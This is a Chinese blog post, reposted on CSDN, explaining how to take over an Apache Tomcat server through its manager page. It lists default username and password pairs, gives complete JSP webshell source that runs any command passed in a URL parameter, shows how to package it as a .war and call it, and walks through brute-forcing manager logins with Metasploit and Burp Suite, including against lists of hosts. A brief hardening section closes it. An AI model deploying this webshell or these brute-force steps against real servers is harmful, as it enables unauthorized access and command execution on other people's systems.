Tomcat管理页面弱口令页面Getshell

最新推荐文章于 2024-07-08 09:25:33 发布
最新推荐文章于 2024-07-08 09:25:33 发布
阅读量5.3k 收藏 13
点赞数 5
分类专栏: 中间件漏洞 文章标签: 中间件 安全漏洞 tomcat
原文链接:https://blog.csdn.net/qq_36119192/article/details/90446112
版权

Tomcat管理页面弱口令页面Getshell

传送门
Tomcat安装完成后,点击页面的 Manager App 处会弹出输入用户名和密码的认证框。
在这里插入图片描述
我们也可以直接访问:http://127.0.0.1:8080/manager/html 来访问该管理页面。

但是默认情况下,该页面只允许 tomcat 本机访问,其他主机访问时会显示403。
这时,只需要修改 webapps\manager\META-INF\context.xml 文件,注释下如下行即可。
在这里插入图片描述
此时,需要我们输入用户名和密码进行登录。我们可以尝试一下该页面常见的几个弱口令:
用户名:admin tomcat manager
密码:admin 123456 tomcat s3cret manager admin123
该页面的认证账户和密码存在于 Tomcat\conf\tomcat-users.xml ,如下:
在这里插入图片描述
如果我们成功登录,我们将进入管理网站的页面。在该页面的上传文件处,存在上传 .waf 文件的上传按钮。我们可以上传后缀为 .war 的木马文件。

jar -cvf one.war jsppwdcmd.jsp      #one.war为生成后的文件,jsppwdcmd为木马文件
 
*****************jsppwdcmd.jsp木马内容********************************
<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

然后我们可以将 one.war 上传到该页面,如下上传成功。
我们点击该 one,进入了该one的目录下。
在这里插入图片描述
于是,我们访问以下链接:http://127.0.0.1:8080/one/jsppwdcmd.jsp?pwd=123&cmd=ipconfig
可以看到,成功获取权限。
在这里插入图片描述
我们就可以执行cmd命令,对服务器进行操作了。
传送门---->提权辅助

利用MSF对tomcat账号密码进行爆破
use auxiliary/scanner/http/tomcat_mgr_login
set rhosts 192.168.10.1
set rport 8080
exploit

找字典进行爆破:
set USER_FILE /opt/字典/Tomcat_user.txt
set PASS_FILE /opt/字典/Tomcat_pass.txt

如果要批量对网站进行爆破的话,可以知道rhosts文件,但是由于他这个有rport,所以我们需要先整理好,将端口是一样的主机放入一个文件中。
set file:/root/ip.txt
set rport 8001
run

利用Burpsuite对tomcat账号密码进行爆破
payloads这里type我们选择Custom iterator,第1个位置就填我们的用户名字典,第2个位置就填 : ,第3个位置就填密码字典
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
然后在 Payload Processing这里我们选择 Base64-encode编码。
在这里插入图片描述
payload encoding这里我们取消勾选URL编码
在这里插入图片描述

点击Intruder开始爆破,对返回长度进行排序,可以看到爆破成功!
对该payload进行base64解密即可得到正确用户名密码。

Tomcat漏洞预防:

1、删除webapps目录中的docs、examples、host-manager、manager等正式环境用不着的目录,这一步就可以解决大部分漏洞。有的网站没删除manager页面,并且管理员弱口令,导致直接Getshell。
2、解决“slow http denial of service attack”漏洞,缓慢的拒绝服务攻击漏洞。slow http denial of service attack漏洞是利用http post的时候,指定一个非常大的content-length,然后以很低的速度发包,比如10-100s发一个字节,让这种连接不断开,这样当客户端连接多了后,占用了webserver的所有可用连接,从而导制DOS,属于一种打拒绝服务攻击。

解决方法:
打开server.xml找到connection
将其中的connectionTimeout="20000"改为1000,其单位为ms。

carefree798
关注
专栏目录
【漏洞复现】 tomcat-pass-getshell 弱口令
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-11 515
Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。通过弱口令登录后台,部署war包geshell
Tomcat无法进入管理页面的问题
01-31
Tomcat无法进入管理页面的问题
Tomcat漏洞(弱口令war包)详解
xinyue9966的博客
02-17 4934
后台弱口令上传war包 影响版本:Tomcat版本:7.0–>8.0 影响说明:后台弱口令登录,上传webshell 环境说明:PHP5.5.38 、 Apache2.4.10、Tomcat 8.0.43 环境搭建 东塔靶场 漏洞原理 tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理tomcat是一个中间件,在B/S架构中,浏览器发出的http请求经过tpmcat中间件,转发到最终的目的服务器上
中间件安全—Tomcat常见漏洞
最新发布
qq_53058639的博客
07-08 1056
链接。
Tomcat弱口令复现及利用(反弹shell)
weixin_45695535的博客
04-04 5756
整体过程欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编
Tomcat 弱口令 && 后台getshell漏洞
weixin_46601374的博客
04-05 7555
漏洞编号 VUL-2021040008 爆发时间 2018-10-10 漏洞简介 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 影响版本 Tomcat8.x,Tomcat7.x 漏洞详情 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+权限分为: manager(后台管理) 1、manager-gui 拥
tomcat弱口令
灰太的表格的博客
08-20 1096
tomcat弱口令 1.前置知识 war包: war是一种web应用程序格式,包含了web应用程序中的所有内容。在这个文件中的所有内容将按一定的目录结构来组织,一般情况下war文件中包含了html,jsp文件或者含有这两种文件的目录。另外它里面还含有一个web-inf目录,在这个目录下存放的是应用配置文件web.xml以及classes目录,classes目录里面包含了编译好的Servlet类和Jsp或Servlet所依赖的其它类。由于war文件将所有的文件合并成一个,因此减少了文件的传输时间 2.漏洞环境
tomcat 弱口令tomcat8】
向安全进发的博客
04-20 831
Tomcat支持后台部署War文件,默认情况下管理页面仅允许本地访问。 攻击条件:如果网站运维/开发人员手动修改配置文件中的信息允许远程IP进行访问(需求),且恶意攻击者拿到管理界面账户密码情况下,则可上传木马文件,控制系统。==
Tomcat弱口令及war包漏洞复现(保姆级教程)
m0_69043895的博客
04-21 1956
这里我们采用针对同一弱口令去爆破不同账号的方式进行猜解,将可能存在的username放入position1的位置,其次放置password在position3的位置,最后attack时爆破的顺序如下图,就不会针对同一账号锁定。CSDN上有个脚本利用的是占满tomcat缓存的方式绕过,当同一账号大于5次登录,就会采用脏数据去进行登录,直到缓存占满后,又会用剩下的可能存在的username进行登录。链接的地址是 /zip文件的前缀/文件名,比如我这里就是http://IP/shell/shell.jsp。
Tomcat弱口令扫描工具
07-18
Tomcat弱口令扫描工具,可自己写字典进行爆破。
Tomcat弱口令扫描器
05-08
弱口令扫描的工具有很多中,而在这其中,比较优秀的一款就是Tomcat,用起来很方便。希望上传给大家共享,也为了以后自己方便查找。
Apache Tomcat后台弱口令扫描
12-11
Apache Tomcat后台弱口令扫描
tomcat弱口令扫描器
08-12
tomcat弱口令扫描器
Tomcat弱口令利用工具
09-03
Tomcat弱口令利用工具,很好用的工具
Tomcat7+ 弱口令 && 后台getshell漏洞简介
玄道的网安博客
06-13 2244
简介 此次环境是模拟真实环境,漏洞为弱口令和支持在后台部署war文件 环境说明 Tomcat7+权限分为: manager(后台管理) manager-gui 拥有html页面权限 manager-status 拥有查看status的权限 manager-script 拥有text接口的权限,和status权限 manager-jmx 拥有jmx权限,和status权限 host-manager(虚拟主机管理) admin-gui 拥有html页面权限 在conf/tomcat-.
【Vulfocus解题复现】tomcat-pass-getshell 弱口令
温氏效应
11-15 3803
漏洞介绍 名称:Tomcat-pass-getshell 弱口令 描述:Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell 解题过程 1、打开靶场环境,并点击Manage App链接,通过弱口令登录平台,账号密码均为:tomcat 2、拖动页面,找到war上传区域,上传jsp木马: 制作jsp木马,.
Tomcat弱口令进入后台部署war包getshell
weixin_50053818的博客
06-30 1126
文章目录环境docker+vuhub搭建环境爆破进入后台上传war包getshell 环境 vulhub docker-compose kali docker+vuhub搭建环境 通过git将vulhub仓库克隆到本地中。 ``` git clone https://github.com/vulhub/vulhub ``` 进入vulhub目录下的tomcat目录即可。 执行docker-compose up -d即可完成tomcat的搭建。 爆破进入后台 直接访问ip:port即可进入tomca
漏洞复现 - - -Tomcat弱口令漏洞
weixin_67503304的博客
08-07 7611
通过弱口令的方法爆破tomcat漏洞,通过上传war包拿到shell,简单的弱口令漏洞复现。
tomcat弱口令复现
09-23
Tomcat管理后台可以通过在Tomcat安装目录下的conf/tomcat-users.xml文件中配置用户名和密码来进行访问。然而,由于管理员为了方便经常使用弱口令,这就导致了Tomcat存在弱口令的安全风险。当Tomcat后台管理用户存在弱口令时,攻击者可以利用这个漏洞来上传webshell并实施攻击。 要复现Tomcat弱口令漏洞,可以按照以下步骤进行操作: 1. 找到Tomcat安装目录下的conf/tomcat-users.xml文件。 2. 使用文本编辑器打开tomcat-users.xml文件。 3. 查找并找到带有用户名和密码的<user>元素。 4. 确认用户名和密码是否为弱口令,例如“admin/admin”。 5. 如果发现弱口令,请及时修改密码,确保使用强密码来提高安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值